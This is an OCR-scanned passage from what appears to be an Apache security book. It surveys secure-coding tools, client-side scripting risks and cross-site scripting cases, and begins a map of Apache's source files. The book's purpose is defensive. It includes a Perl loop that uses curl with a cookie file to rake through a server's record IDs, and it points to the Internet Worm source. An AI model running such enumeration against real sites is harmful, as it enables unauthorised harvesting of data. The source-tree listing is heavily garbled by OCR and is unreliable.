in C and C++. Learn more at 
http: //www.cs.ntu.edu.au/homepages/pjm/nana-home/. 

Insure Insure’s Insure++ detects crash-causing errors in C/C++ applications. Using 
mutation testing, Insure++ examines and tests the code, reports errors, and 
pinpoints the errors’ exact locations. Insure++ also performs coverage analy- 
sis, indicating which sections of the code were tested. Find out more at 
http: //www.parasoft.com/jsp/products/home. jsp?product=Insure. 

mpatrol The mpatrol library is a powerful debugging tool that attempts to diagnose 
run-time errors caused by the incorrect use of dynamically allocated memory. 
It acts as a malloc() debugger for debugging dynamic memory allocations, 
although it can also trace and profile calls to malloc() and free(). Find out 
more at http: //www.cbmamiga.demon.co.uk/mpatrol/. 
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TABLE 12.4 Continued 





Variable 


Purpose 





Purify 


ObjectManual 


DOC++ 


cgihtml 


MIME++ 


Latro 


msystem 


crashme 


showid 


worm-src 


Purify, from Rational, is a runtime error and memory leak detector. It runs 
after compilation, and post-processes the object modules from which an 
executable is generated, producing an executable with runtime error check- 
ing inserted into the object code. As the code is executed, all memory 
accesses are validated to detect and report errors at the time of occurrence. 
Purify also reports memory leaks, showing where memory has been allo- 
cated, but to which there are no pointers, so that it can never be used or 
freed. Learn more about it at http: //www.rational.com/. 

Generates HTML documentation for your C++ programs on-the-fly (especially 
useful if you’re doing professional development). Find out more at 

http://www. obsoft.com/Product/ObjMan. html. 

A tool for generating HTML documentation for your C/C++/Java programs 
on-the-fly (especially useful if you’re doing professional development, or 
where you’re accountable for the docs). More information can be found at 
http: //docpp.sourceforge.net. 

A library for writing HTML out from C programs (useful when you don’t want 
to bother coding HTML parsing routines yourself). To get it, go to 

http: //www.eekim.com/software/cgihtml1/. 

A C++ class library for parsing, creating, and editing messages in MIME 
format, it can streamline your work in many instances. Get it at 

http://www. hunnysoft.com/mimepp/. 

Scans remote Windows hosts for insecure Perl installations (useful when you 
establish a heterogeneous intranet. Get it at 

http: //language.perl.com/news/latro-announce.html. 

Offers secure versions of system(3), popen(3), and pclose(3). Check out 
msystem at ftp: //coast.cs.purdue.edu/pub/tools/unix/msystem.tar.Z. 
A tool for testing your operating environment software’s robustness. In 
certain cases, it can reveal weaknesses in your programs. Check out crashme 
at ftp: //coast.cs.purdue.edu/pub/tools/unix/crashme/. 

A shell script that records and reports the UID and GID of a program while it 
is executing. Check out showid at 
ftp://coast.cs.purdue.edu/pub/tools/unix/show_effective_uid. 

The source code to the Internet Worm, an excellent example of how buffer 
overruns and other attacks operate. Get it at 
ftp://coast.cs.purdue.edu/pub/tools/unix/worm-src.tar.gz. 
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TABLE 12.4 Continued 


Variable Purpose 





PAM 


PAMs (Pluggable Authentication Modules) are modules that enable you to 
alter how Linux applications perform authentication without actually rewrit- 
ing and compiling them. Learn more at 

http://www. linuxdoc.org/HOWTO/User -Authentication -HOWTO/x101.html. 


CGIWrap CGIWrap is a gateway program that enables general users to use CGI scripts 


and HTML forms without compromising the security of the http server. 
(Scripts run with the permissions of the user who owns the script.) Check out 
CGIWrap at ftp://concert.cert.dfn.de/pub/tools/net/cgiwrap/. 





Other Online Resources 


In addition to the information here, there are many online documents that offer 
excellent secure programming advice. Here are a few: 


“CGI Security Tutorial,” Michael Van Biesbrouck. http: //www.csclub.uwater - 
loo.ca/u/mlvanbie/cgisec/. 


“How to Write a Setuid Program,” Matt Bishop. 
http: //nob.cs.ucdavis.edu/~bishop/papers/Pdf/sproglogin. pdf. 


“Robust Programming,” Matt Bishop. 
http: //nob.cs.ucdavis.edu/~bishop/classes/ecs153 - 1998 - 
winter/Pdf/robust. pdf. 


“Security Code Review Guidelines,” Adam Shostack. 
http: //packetstorm.widexs.n1l/programming-tutorials/code.review.html. 


“Shifting the Odds: Writing (More) Secure Software,” Steve Bellovin, AT&T 
Research, Murray Hill, NJ. http: //www.research.att.com/~smb/talks/odds.ps. 


“The Unofficial Web Hack FAQ,” Simple Nomad. 
http: //www.nmrc.org/faqs/www/ index.html. 


“The World Wide Web Security FAQ,” Lincoln D. Stein. 
http: //www.w3.org/Security/Faq/www-security-faq.html. 


“UNIX Security: Security in Programming,” Matt Bishop, SANS ‘96. 
http: //www.cs.ucdavis.edu/~bishop/scriv/1996-sans-tut.ps. 


“Writing Safe Privileged Programs,” Matt Bishop, Network Security 1997. 
http: //www.cs.ucdavis.edu/~bishop/scriv/1997-ns97.ps. 
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Summary 


Your main aim is to anticipate every possible contingency that can result from your 

program’s use. That is, approach your code as a cracker would. Visit cracker sites and 
study how similar programs have been broken in the past. Apply these principles to 

your own program and see what happens. This is really the only way to be sure. 


1 3 IN THIS CHAPTER 


e What Is Client-Side 


Hacking Secure Code: Programming? 
Apache at Client Side e General Client-Side Security 


Issues 

e JavaScript 
One would think that client-side programming wouldn’t e VBScript 
bear much on server security. Unfortunately, that isn’t 
true. Not only can client-side programming affect your 
server, it can also affect servers over which you have no 
control and of which you have no knowledge. This is so, 
even though client-side code has nothing to do with 
Apache, and Apache provides no mechanism to shore up 
client-side code. This chapter briefly covers the issue. 


What Is Client-Side Programming? 


Client-side programming is programming in which you 
develop code to execute on the client side, most often (but 
not always) in a user’s Web client. 


Client-side languages or technologies you'll likely use are 
e JavaScript 
e Jscript 
e VBScript 


We'll soon look at these and other languages, but first let’s 
look at why client-side programming is perilous. 
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Contributory Factors in Client-Side Insecurity 


Factors that most contribute to client-side insecurity include the following: 
e Exposed source code 
e User primacy 


e Limited security features of client-side languages 


Exposed Source Code 

The chief reason for client-side code risks is fundamental: Users can easily examine 
your client-side code by viewing your HTML source. In addition to exposing your 
general logic, your Web page’s source also often exposes 


e Variable and function names 
e Paths and hostnames 


e Other languages, file types, and data types 


Variable and Function Names Variable names needn’t necessarily communicate 
sensitive data about your system or network, but in many cases, they do. This is an 
area where clean programming practices clash with security aims. 


Nearly all developers who have formal computer science educations (and many who 
don’t) adhere to traditional naming conventions, conventions that call for not 
merely readability but also objective relationships between variable and function 
names and their respective purposes. 


A variable or function’s name should, in theory, reflect what that variable or func- 
tion does. Some examples: 


e callSQLbox 

e dbQuery 

e filterInput 

e GetUserPassword 
e QueryDB 

e registerUID 

e SendString 


e userInput 
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Various forces bear on developers to name variables and functions in this manner. 
Administrative types, for example, demand this so that they can quickly fire one 
programmer and hire another, or skip through technical portions of due diligence 
procedures. They want code that nearly anyone can understand so that they’re not 
dependent on any one individual. 


Similarly, many programmers do this to clearly communicate to other developers 
their application’s design. As several members of our judiciary have recently 
observed, source code is one form of free speech, and the language in which 
programmers impart ideas to their peers. 


Such naming conventions are fine when creating back end utilities, compiled 
programs, or when distributing open source applications. However, when you write 
client-side code, reconsider naming your variables and functions in this way. 


Certainly, experienced programmers will skillfully read your code anyway, no matter 
how arcane your variable and function names get. However, at least crackers won’t 
snag your site from garden-variety Web searches. Search engines like Google traverse 
page sources—and not merely page titles, META tags, and descriptions. 


Paths on Your Network Paths are another issue, and one not limited to client-side 
scripts. HTML and XML both naturally carry path information. However, scripts 
often point to sensitive resources, whereas HTML and XML rarely do so. 


To appreciate the difference, consider this HTML reference: 


<a href=http://images.3rdhost.net/images/smile.gif> 


This doesn’t tell an attacker much; it merely indicates that you’re pulling images 
from another box. Many firms do this, especially if they have extensive content to 
which many developers contribute, often from disparate locations. Or, perhaps 
administrators seek to offload images (or processing) to beefy servers, thus allowing 
Web hosts to do nothing save receive and process requests. 


But consider this code: 


url = "http://dbserver.myhost.net/lookup?id=40023" ; 


Here, we have a different situation: A database server houses a script that triggers 
output depending on a record or user number—and this is patently obvious to 
anyone. From this, enterprising attackers can make educated choices about what 
steps to take next. At a minimum, this invites attackers to write a robot that rakes 
through the record list and performs some uniform operation on them. 
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For example: 


#!/bin/perl 
# Establish the base URL to get 
$baserl = "http://modules.apache.org/search?id="; 


# set a counter for the index number 
$basenumber=1 ; 


while($basenumber < 343) { 

system("curl -b \"\/shacker\/.netscape/cookies\" 
=Sbaserl$basenumber -o $basenumber.htm1") ; 
$basenumber++; 


} 


Whenever possible, if your system is built this way, write server-side code instead. 


WARNING 


Note that even anchoring such code at the server might not do the trick. Given the proper 
circumstances, attackers can expose server-side JavaScript. Microsoft InterDev and 
Development Studio in many cases, for example, will suck down server-side code—even 
though the browser initially reports a failure. When attackers clear the prohibitive dialog box, 
Development Studio opens and displays the code in a debugging environment. This is true for 
style sheets, JavaScript, Jscript, and even VBScript. 





One method of protecting your code is to store it server-side, such as storing 
JavaScript functions inside *.js files. This is good, providing you take adequate 
precautions. For example, consider storing all such files together in a designated 
directory, and writing rules that disallow client requests for them (or protecting that 
directory using stringent permissions). If you don’t, users will simply point at files in 
that directory (with a browser that doesn’t handle *.js files) and download them to 
their local system. 


Other Languages, File Types, And Data Types Finally, some scripts reference other 
languages, file types, or data types. These could be 


e Values used in authentication 
e Include or require files 
e Java classes 


e Media files 
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e Other client-side scripts 


e Server-side scripts 


In some cases, you cannot avoid including or referencing such values in client-side 
source. However, never embed any variable, function, file type, or data type that your 
system uses in authentication inline. It’s too dangerous, because it gives casual users 
a look inside your authentication mechanisms. 


User Primacy 

Another point to remember is this: After data arrives at the client side, users control 
it. They can change variable values, alter the structure of functions, change host- 
names and paths, and so on. And, if they do it right, they can use this altered code 
to test your server six ways to Sunday. 


Limited Security Features of Client-Side Languages 

Finally, know that client-side languages aren’t designed expressly with security in 
mind. In fact, some such languages (VBScript being one good example) strongly 
favor functionality. VBScript is capable of doing things no client-side scripting 
language ought to, and is superb at glueing together Microsoft-centric environments. 


General Client-Side Security Issues 


Client-side programming can bring trouble in three ways: 
e Danger to your server 
e Danger to the client user’s machine 


e Danger to a third-party server 


Each problem poses different risks. As to your server, though you'll likely never sue 
yourself or your firm, you’d doubtless rather avoid security intrusions. And I 
presume that you’ve taken all the appropriate backup and disaster recovery 
measures, and that even if you experience an intrusion, you can revive your Web 
hosts in less than an hour. 


Client users are edgy folks, though, and don’t always institute adequate precautions. 
Many are sitting ducks. If you inadvertently damage their systems, they’ll shun your 
site or spread rumors about your security and you'll lose money, traffic, or both. Or 
in the worst case, such users might even sue you. 


Finally, firms that maintain third-party Web servers are even more likely to sue—if 
you're the problem source. Of course, in the end analysis, they (and not you) are 
responsible for security breaches they suffer, and that would eventually bear out in 
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court. But you never want to see a courtroom or have bitter exchanges with other 
Webmasters. To guard against such situations, strive to write tight client-side code. 


Danger to Third-Party Servers 


How in heaven’s blue sky could your site endanger another? It seems absurd, but it 
isn’t. This happens through a process known as cross-site scripting. 


Cross-site scripting is where, because of a weakness in your code, an attacker can use 
his machine to force your machine to attack a third Web host. 


A recent example is DCP-Portal. DCP-Portal, a site administration tool available at 
http: //www.dcp-portal.com/, is an advanced, PHP-based content management 
system for Linux systems. 


In mid-February 2002, Ahmet Sabri Alper from ALPER Research Labs reported a 
serious flaw. He wrote: 


DCP-Portal is a content management system with advanced features like Web-based update, 
link, file, member management, poll, calendar, and so on. Its main features include an admin 
panel to manage the entire site, a smart HTML editor to add news, content, and announce- 
ments, the capability for members to submit news/content and write reviews, and much 
more. It’s an open-source project, which is also supported by FreshMeat...A Cross Site 
Scripting vulnerability exists in DCP-Portal. This would enable a remote attacker to send infor- 
mation to victims from untrusted Web servers, and make it look as if the information came 


from the legitimate server. 


The weakness was in a DCP-Portal PHP user script that enabled attackers to alter 
submitted JavaScript via PHP. This arcane example shows how not one but two 
languages contributed to a serious hole. Attackers could send JavaScript functions 
and commands that could, under the correct circumstances, attack a third machine. 
Table 13.1 describes some recent cross-site scripting issues. 


TABLE 13.1 Various Cross-Site Scripting Issues 





Date Issue 





Actinic Catalog Actinic Catalog is a Web-enabled e-commerce application. In February 
2002, frog-m@n demonstrated that Actinic Catalog harbored a hole 
that enabled attackers to nest illegal and malicious code that, when 
executed, would perform various nefarious acts on the client's 
machine. Learn more at http: //www.actinic.com/home.html. 

DeleGate DeleGate is an open source proxy server for Windows and Unix avail- 
able at http: //www.delegate.org/delegate/. In February 2002, 
Global InterSec LLC revealed cross-site scripting vulnerabilities in 
DeleGate’s http(s) proxy code. Learn more at http: //online.securi- 
tyfocus.com/advisories/3857. 


TABLE 13.1 Continued 
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Date 


Issue 





HNS 


MakeBid 


Powie PForum 


Prospero Message Boards 


SlashCode 


HNS (Hyper NIKKI System) is a Web-based diary application available 
at http: //www.h14m.org/. In late February 2002, the Hyper NIKKI 
System team announced a cross-site scripting hole. The scripts 
log.cgi and title.cgi enabled attackers to embed malicious code 
that would later attack legitimate users viewing it. Learn more at 
http: //www.h14m.org/. 

The MakeBid system (specifically, MakeBid Auction Deluxe) is a Web- 
enabled, Perl-based package that facilitates online auctions. In late 
February 2002, Blake Frantz demonstrated that MakeBid enabled an 
attacker to place an item on auction with potentially malicious code in 
the description fields. Unsuspecting users later executed this code 
simply by viewing the auction item. Learn more at 

http: //online.securityfocus.com/archive/1/255251. 

Powie PForum is a popular, PHP-based, MySQL-back-ended forum 
software that many Webmasters use to provide discussion forum capa- 
bilities to their user base. In late February 2002, Jens Liebchen demon- 
strated that Powie PForum does not adequately filter HTML tags, thus 
enabling attackers to pass malicious scripts inline to legitimate users 
on the same board (and perhaps steal cookie or other authentication 
data). Learn more at 

http: //archives.neohapsis.com/archives/bugtraq/current/0260. 
html. 

Prospero Message Boards is a package that provides Web users with 
forum capabilities. In late February 2002, The Computer Emergency 
Response Team reported a cross-site scripting hole in Prospero wherein 
attackers could send malicious JavaScript to the server. Legitimate 
users would later download these and their browser would execute 
them. For more information, see CERT Advisory CA-2000-02, 
“Malicious HTML Tags Embedded in Client Web Requests,” available at 
http: //www.cert.org/advisories/CA-2000-02.html1. 

SlashCode is a powerful, Web-enabled discussion software package. In 
February 2002, Hiromitsu Takagi demonstrated that SlashCode 
harbored a cross-scripting hole that enabled attackers to nest illegal 
and malicious code that, when executed, would steal unsuspecting 
and legitimate users’ cookie information (and thus, circumvent the 
authentication scheme). Learn more at http: //online.securityfo- 
cus.com/archive/1/256924. 
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JavaScript 


JavaScript is a powerful scripting language from Netscape, and works in and manipu- 
lates Communicator’s environment. To deal with cross-site attacks, Netscape took a 
slightly different approach, called the Same Origin Policy. The Same Origin Policy is 
essentially this: The JavaScript engine examines the initial or the original URL 
purported by a script. If that script tries to access another site in-program, JavaScript 
won’t allow it. This is an excellent idea—and something that you can also integrate 


into your server-side scripts. 


Moreover, JavaScript prevents access to sensitive files (such as preferences. js) 

through a permissions scheme. This scheme prohibits certain objects and methods 
from invoking methods that can cull sensitive information from a user’s hard disk 
drive. Table 13.2 lists JavaScript objects and methods that require special privileges. 





TABLE 13.2 JavaScript Objects and Methods That Require Permissions 

Method Discussion 

about about URLs (for example, about: cache or about:global) are 
restricted. To perform an about:blank, the calling party needs 
UniversalBrowserRead. 

close The close method, which allows you to close the instant browser 
window, requires UniversalBrowserWrite. 

DragDrop DragDrop requires UniversalBrowserRead. 


enableExternalCapture 


The enableExternalCapture method allows you to capture page 
events loaded from disparate servers. This requires 
UniversalBrowserWrite. 


event To set properties on an event, the function or code must have 
UniversalBrowserWrite. 

history The history object, one of the most commonly used, requires 
UniversalBrowserRead. 

moveBy The moveBy method, which allows you to move a window, requires 
UniversalBrowserWrite. 

moveTo The moveTo method, which allows you to move a window, requires 
UniversalBrowserWrite. 

navigator The navigator object needs special privileges to read 
(UniversalBrowserRead) and write (UniversalBrowserWrite) user 
preferences (preferences. js). 

open The open method, which allows you to open new windows, requires 


UniversalBrowserWrite. 


JavaScript 


TABLE 13.2 Continued 


Method Discussion 





resizeBy The resizeBy method, which allows you to move a window, requires 
UniversalBrowserWrite. 

resizeTo The resizeTo method, which allows you to resize a window, requires 
UniversalBrowserWrite. 

window The window object supports several methods that require permissions, 
including close, enableExternalCapture, moveBy, moveTo, open, 
resizeBy, and resizeTo. 





This doesn’t mean, however, that JavaScript doesn’t pose risks. It has a significant 
security history all the way back to its inception. But when we discuss security holes 
in client-side scripting languages, we have a two-sided situation. Vendors can alter 
their client-side languages and interpreter engines to be more secure, but this doesn’t 
necessarily cure this or that problem forever. 


Users are strange creatures. Some users, once comfortable with this or that applica- 
tion (or even this or that version of an application) are reticent to change or 
upgrade. This means that even though Netscape observed good security practices and 
updated both its languages and interpreters, users are floating around out there with 
old Netscape versions. For these folks, old holes are still “real” and remain so until 
such users upgrade. 


Today, JavaScript most commonly surfaces in situations where attackers can embed it 
in submission forms (or when aiming at server scripts) and there pass malicious code 
to third parties. Some recent victims include the following: 


e COWS CGI Online Worldweb Shopping—http: / /www.cows.co.uk/ 

e DCP-Portal—http: //www.dcp-portal.com/ 

e Plumtree Corporate Portal—http: //www.plumtree.com/products/portal/ 
e Proxomitron—http: //spywaresucks.org/prox/ 


e YaBB—http: //www.yabb.org/ 


JavaScript itself doesn’t have—at this moment—any holes within it (nor does 
VBScript, as I’ll explain later). Rather, nearly all holes arise from programming errors. 
The usual suspects: 


e Developers fail to adequately filter input 
e Developers fail to institute same origin checks 


e Developers expose sensitive information in their code 
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So long as you observe these issues as listed at chapter’s end, your code shouldn't 
result in problems. 


VBScript 


VBScript is a scripting language that operates in and manipulates Microsoft Internet 
Explorer’s environment. VBScript, now integrated into a blanket technology called 
Windows Script, as described by Microsoft, brings 


...active scripting to a wide variety of environments, including Web client scripting in 
Microsoft Internet Explorer and Web server scripting in Microsoft Internet Information Service. 
VBScript talks to host applications using Windows Script. With Windows Script, browsers and 
other host applications do not require special integration code for each scripting component. 
Windows Script enables a host to compile scripts, obtain and call entry points, and manage 
the namespace available to the developer. With Windows Script, language vendors can create 
standard language runtimes for scripting. Microsoft will provide runtime support for VBScript. 
Microsoft is working with various Internet groups to define the Windows Script standard so 
that scripting engines can be interchangeable. Windows Script is used in Microsoft Internet 
Explorer and in Microsoft Internet Information Service. (Visual Basic Scripting Edition, VBScript 
Documentation, MSDN Online (http: //msdn.microsoft.com/library) 


Much like competing languages, VBScript resides most frequently in HTML. Think of 
it as having all the functionality of JavaScript with Visual Basic-style syntax. 


A hello world example: 


<HTML> 

<HEAD> 

<TITLE>Test Button</TITLE> 

</HEAD> 

<BODY> 

<FORM NAME="Form1 "> 

<INPUT TYPE="Button" NAME="Button1" VALUE="Click"> 
<SCRIPT FOR="Buttoni" EVENT="onClick" LANGUAGE="VBScript"> 
MsgBox "Hello World!." 

</SCRIPT> 

</FORM> 

</BODY> 

</HTML> 


However, VBScript can also reach other applications, and on nearly all Windows 
platforms (95, 98, NT, 2000, XP). Often, VBScript’s extended functionality can 
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backfire, as it did in late February 2002 when Zentai Peter Aron illustrated that 
VBScript could, in MSIE, access from one frame the contents of another, even when 
those frames originated or resided on different systems. 


Thus, as Microsoft conceded, 


A malicious user could exploit this vulnerability by using scripting to extract the contents of 
frames in other domains, then sending that content back to their Web site. This would enable 
the attacker to view files on the user’s local machine or capture the contents of third-party 
Web sites the user visited after leaving the attacker's site. The latter scenario could, in the 
worst case, enable the attacker to learn personal information like user names, passwords, or 
credit card information. 


NOTE 


To learn more about this issue, see Microsoft Security Bulletin MS02-009, “Incorrect VBScript 
Handling in IE can Allow Web Pages to Read Local Files,” February 21, 2002, at 

http: //www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bul 
letin/MS02-009.asp. 





Shortly after Microsoft released VBScript, its engineers recognized that the language’s 
functionality exceeded what average Webmasters needed, and hence reduced its 
feature set. VBScript does not support the following features: 


e DDE (Dynamic Data Exchange) 
e Direct Database Access (DAO) 

e DLL execution 

e File I/O 


e Object instantiation 


As of release 2.0, VBScript’s security is much improved. 


Summary 


When developing client-side code, take these precautions: 
e Confine functions that pull data from database servers to server-side code only. 


e Carefully consider how you name variables, functions, data structures, and 
other key script components. 
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e Always provide an additional layer of data validation at the client level when 
possible (block metacharacters and other illegal input). 


e Provide at least baseline server-side filtering that checks for additional SQL 
statements, cookies, persistent (state) data, posted data, query strings, and 
URLs. 


PART V 
Advanced Apache 


IN THIS PART 


14 Apache Under the Hood: Open Source and Security 
15 Apache/SSL 

16 Apache and Firewalls 

17 Apache and Ciphers 


18 Hacking Homegrown Apache Modules 
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Apache Under the Hood: 
Open Source and 
Security 


la the Introduction, I opined that open source lends to 
more security. However, I also observed that although this 
is true, you must know where to look before you can 
examine Apache’s security facilities. This chapter paints an 
Apache security “road map.” 


The road map includes the following: 
e An Apache source tree with pointers 
e Files that relate to password authentication 


e Files that deal with general security issues 


Security Contexts in Apache’s Source 
Tree 


In Listing 14.1, you'll find the Apache source tree, along 
with notations indicating the location of security-related 
information therein. 


IN THIS CHAPTER 


e Security Contexts in Apache's 
Source Tree 


e Files That Deal with 
Passwords 


e Files That Deal with General 
Security 


e Key Apache C Source Files 
and What They Do 


e Include File Cross Reference 
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LISTING 14.1 Security Contexts in Apache’s Source Tree 


222??httpd-2_0 28 - [who handles Apache security, changes, README] 
????build - 


2 


????win32 


????docs 


OY VN Y VN VY Y VN NY NY VN VN NN VN NY NOY 


222?cgi-examples 

????conf - [Example configuration files] 

2222?docroot 

????error 

? ????include 

????icons 

? ????small 

????man 

????manual - [HTML docs, logging, installation] 
????developer - [Docs, Request Processing model] 
????faq 
????howto - - [Docs, auth, CGI] 
????images 
????misc - [Docs, custom error msgs, security tips] 
????mod - [explanation of modules] 
????platform - [Run Apache as Windows service] 
????programs - [Explanation of htpasswd] 
????search 
????ss1l1 - [howto, glossary, config tips] 
????vhosts 


????include - [httpd.h, http_request.h] 
????modules 


D O O nN NNN NN NNN NY NY 


????aaa - [mod_access.c, network access control] 
????arch 

? ????netware 

?  2222win32 

????cache 

????dav 

? 2???fS 

? ????main 

????echo 

????experimental - 

????filters - [mod_include.c, Win32 canonical file/directory] 
????generators 

????http 

???? loggers 
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LISTING 14.1 Continued 





OY VN VO WD 


????mappers - [mod_negotiation.c, mod_rewrite.c] 
222?metadata 

????proxy 

????ss1l - [The SSL engine] 

222??test 


222208 


NOVY NN YN NY 


222??beos 

2222bs2000 

22??netware 

2222082 

????tpf 

? ????samples 

????unix - [unixd.c, -DBIG_SECURITY_HOLE] 
????win32 


????server - [main.c, protocol.c, request.c, vhost.c] 


? 
? 
? 
ih 
? 
? 
? 
? 
2 
i 


222?mpm 

????beos 
????mpmt_os2 
????netware 
????perchild 
????prefork 
????spmt_os2 
????threaded 


????winnt - [security descriptors, ACLs, permissions] 


????worker 


????srclib 


????apr 

????build 

????docs - [Docs, canonical filenames] 
????dso 

? ????aix 

????beos 

2222082 

222208390 

????unix 

? ????win32 

????file_io 

? ????netware 

? ????0s2 
? 


? 
a 
? 
? 
2? 2 
2? 2 
? ? 
2? 2 
2? 2 
2? 2 
? 

2 

? 


222??unix 
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LISTING 14.1 


Continued 





Nyy no vn vy yyy vy yy ny yy NY YN ND NNN NY NY HY NY YY NY YY HY HY NY NY HY ND 


? ????win32 - [security descriptors, SID, pipes] 


2222118n 
? 2?2??unix 
????images 
????include - [md5, apr_md5.h] 
????arch 
2222aix 
????beos 
????netware 
2222082 
222208390 
222?unix 
222 2win32 
???locks 
????beos 
????netware 
2222082 


????Unix 


????win32 - [security descriptors, SID, perms] 


? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
????memory 
? ????unix 
????misc 

? ????netware 

? ????0s2 

?  2222unix 

? ????win32 
????mmap 

?  222?unix 

? ????win32 
????network_io 

? ????beos 

? ????0s2 

? ????unix 

? ????win32 
????passwd - [MD5, apt_md5.c] 
????shmem 

? ????beos 

? ????0s2 

? ????unix 
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222?strings 
????tables 
222?test 
????threadproc 
? ????beos 
? ????netware 
? ????0s2 
? ????uUnix 
? ????win32 - [proc.c: Proc/thread security attributes] 
????time 
? ????unix 
? ????win32 
????user 

????netware 

????Unix 

????win32 
????apr-util 
????buckets 
????build 
????crypto - [apr_md4.c, MD4] 
????dbm 
? ????sdbm 
????encoding 
????hooks 
????include - [apr_md4.c MD4] 
? ????private 
222?1dap 
222?misc 
????test - [testmd4, MD4] 
????uri - [apr_uri.c, password suppression] 
????xml 

????expat 

????conftools 
????lib 


On vn vn n vn vn vn vr S] 


Onn vn vn vn vn vn nnn nvr VN YY YY 


????pcre 
????doc 
????testdata 
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Files That Deal with Passwords 


The following functions and routines deal with password handling in Apache: 


apr_compat.h—Defines ap_validate_password and apr_password_validate. 


apr_errno.h—Beginning at line 220: sets up APR_EMISMATCH. (Two passwords 
do not match.) 


apr_getpass.c—Abstraction to provide for obtaining a password. 


apr_lib.h—Beginning with comments at line 239, validates any password 
encrypted with any algorithm that APR understands. 


apr_md5.c—Beginning with comments at line 496, sets up MDS passwords. 


apr_md5.h—Beginning with comments on line 173, sets up routines to encode 
passwords in MDS and, culminating on line 179, apr_md5_encode(). 


apr_sha1.c—Provides a means to SHA1 crypt/encode a plaintext password. 


apr_sha1.h—Beginning with line 80, handles the SHA password, sets the 
length, provides a means to crypt/encode the string, makes it compatible with 
Netscape, and so on. 


apr_uri.c—Optionally suppresses passwords for security reasons. 


apr_uri.h—Beginning at line 107, defines APR_URI_UNP_OMITPASSWORD, 
APR_URI_UNP_OMITUSERINFO, APR_URI_UNP_REVEALPASSWORD; and beginning at 
line 165, suppression of the password for security reasons. 


errorcodes.c—Returns passwords do not match. 
http_protocol.c—Describes credentialing by password. 
http_protocol.h—Get the password from the request headers. 
main.c—apr_password_validate(). 


mod_auth.c—Beginning at line 114, tries to open the password file and if possi- 
ble, checks the password; if not, it reports a failure. Culminates with a 
Password Mismatch on line 234 if the password is bogus. 


mod_auth_anon.c—Beginning at line 111, establishes and claims memory for 
anonymous password (if required, or otherwise reports a failure), checks if the 
password is filled out, and finally checks to see if it looks like an e-mail address 
(culminating on line 256). 


mod_auth_db.c—Beginning on line 150, establishes the DB file’s location, and 
culminating with line 332, returns a Password Mismatch if the password is 
bogus. 
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e mod_auth_dbm.c—Beginning on line 143, establishes the DBM database file to 
look at and culminates on line 268, reporting a Password Mismatch if the pass- 
word is bogus. 


e mod_auth_digest.c—Beginning with comments on line 650, sets the user- 
name/password hash filename, tries to open the password file and, if possible, 
checks the password; if not, reports a failure. Otherwise, it culminates at line 
1723 with a Password Mismatch if the password is bogus. 


e mod_example.c—Beginning on line 1087, shows a match procedure between 
the sent password and the database (encoded) password. 


e mod_log_config.c—Returns URI-nested password. 
e mod_proxy.c—See APR_URI_UNP_REVEALPASSWORD. 
e mod_proxy.h—Sets up **passwordp. 


e mod_status .c—Comments advise to password-protect your status pages 
(line 68). 


e proxy_ftp.c—Checks password (see lines 126, 144, 149, 199, 200, 846, 849, 
856). 


e proxy_util.c—On lines 206-610, sets up and checks password. 

e scoreboard.c—Prevents passwords from being visible in the server status view. 
e service.c—Reports a NULL password. 

e ssl_engine_kernel.c—Sets up a dummy password (886-926). 

e ssl_engine_log.c—Reports bad passwords (145). 


e ssl_engine_pphrase.c—Announces possible error in getting the password (line 
510). 


e util_ldap.h—Checks a username/password combination by binding to the 
LDAP server. 


e util_script.c—Discusses attackers capturing passwords (CGI). 


Files That Deal with General Security 


The following files handle various security tasks: 


e apr_file_info.h—Defines APR_FILEPATH_SECUREROOTTEST and 
APR_FILEPATH_SECUREROOT. 


e apr_sha1.c—NIST Secure Hash Algorithm. 
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e apr_sha1.h—NIST Secure Hash Algorithm. 

e core.c—Sets APR_FILEPATH_SECUREROOT. 

e getuuid.c—Gets IEEE node ID. 

e log.c—Logging. 

e mod_auth.c—Sets auth_authoritative to TRUE. 

e mod_auth_db.c—Sets auth_dbauthoritative to TRUE. 

e mod_auth_dbm.c—Sets auth_dbmauthoritative to TRUE */. 
e mod_isapi.c—Sets SERVER_PORT_SECURE. 

e mod_usertrack.c—Uses cryptographically secure cookies. 


e proxy_connect.c—Handles Netscape CONNECT method-secure proxy requests. 


Key Apache C Source Files and What They Do 
Table 14.1 describes key Apache C source files and what they do. 


TABLE 14.1 Key Apache C Source Files 





File Purpose 

beos.c The new BeOS MPM 

cache_storage.c Cache module 

cache_util.c Cache support module 

config.c Contains general command loop and bookkeeping 
dbm.c DAV extension for DBM-style databases 

fdqueue.c Detects when the fd_queue_t is full 

http_core.c The Big Kahuna—the heart of the server 
http_protocol.c Routines that directly communicate with clients 
http_request.c Functions to get and process requests 

libprews.c NLM 

lock.c DAV file system lock implementation 

log.c Dealing with the logs and errors 

mod_access.c Security options 

mod_actions.c Executes scripts based on MIME type or HTTP method 
mod_alias.c Stuff for dealing with directory aliases 

mod_auth.c HTTP authentication 

mod_auth_anon.c Anonymous authentication 

mod_auth_db.c db-based authentication 


mod_auth_dbm.c dbm-based authentication 
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TABLE 14.1 Continued 





File 


Purpose 





mod_auth_digest.c 
mod_autoindex.c 
mod_cache.c 
mod_case_filter.c 
mod_case_filter_in.c 
mod_cern_meta.c 
mod_cgi.c 
mod_cgid.c 
mod_charset_lite.c 
mod_dav.c 
mod_dav_fs.c 
mod_dir.c 
mod_disk_cache.c 
mod_env.c 
mod_example.c 
mod_expires.c 
mod_ext_filter.c 
mod_file_cache.c 
mod_headers.c 
mod_include.c 
mod_info.c 
mod_isapi.c 
mod_log config.c 
mod_mem_cache.c 
mod_mime.c 
mod_mime_magic.c 
mod_negotiation.c 
mod_proxy.c 
mod_rewrite.c 
mod_setenvif .c 
mod_so.c 
mod_speling.c 
mod_ssl.c 
mod_status.c 
mod_suexec.c 
mod_unique_id.c 
mod_userdir.c 
mod_usertrack.c 
mod_vhost_alias.c 
mod_win32.c 


MDS digest authentication 

Handles the on-the-fly HTML index generation 

Cache module 

“Ben messing around” 

A sample input filter (he’s serious now) 

Controls Meta File behavior on a per-directory basis 
Keeps all script-related ramblings together, compliant to CGI/1.1 
Keeps all script-related ramblings together with new vars 
Simple hokey charset recoding configuration module 
DAV extension module for Apache 2.0 

DAV extension 

Handles default index files, and trailing -/ redirects 
Disk cache module 

Environment 

Apache sample module 

Controls the form of the Expires: header 

Allows Unix-style filters to filter http content 

Better caching for W32 

Add/append/remove HTTP response headers 

Handles the server-parsed HTML documents 

Info Module, displays configuration information 
Implements Microsoft's ISAPI 

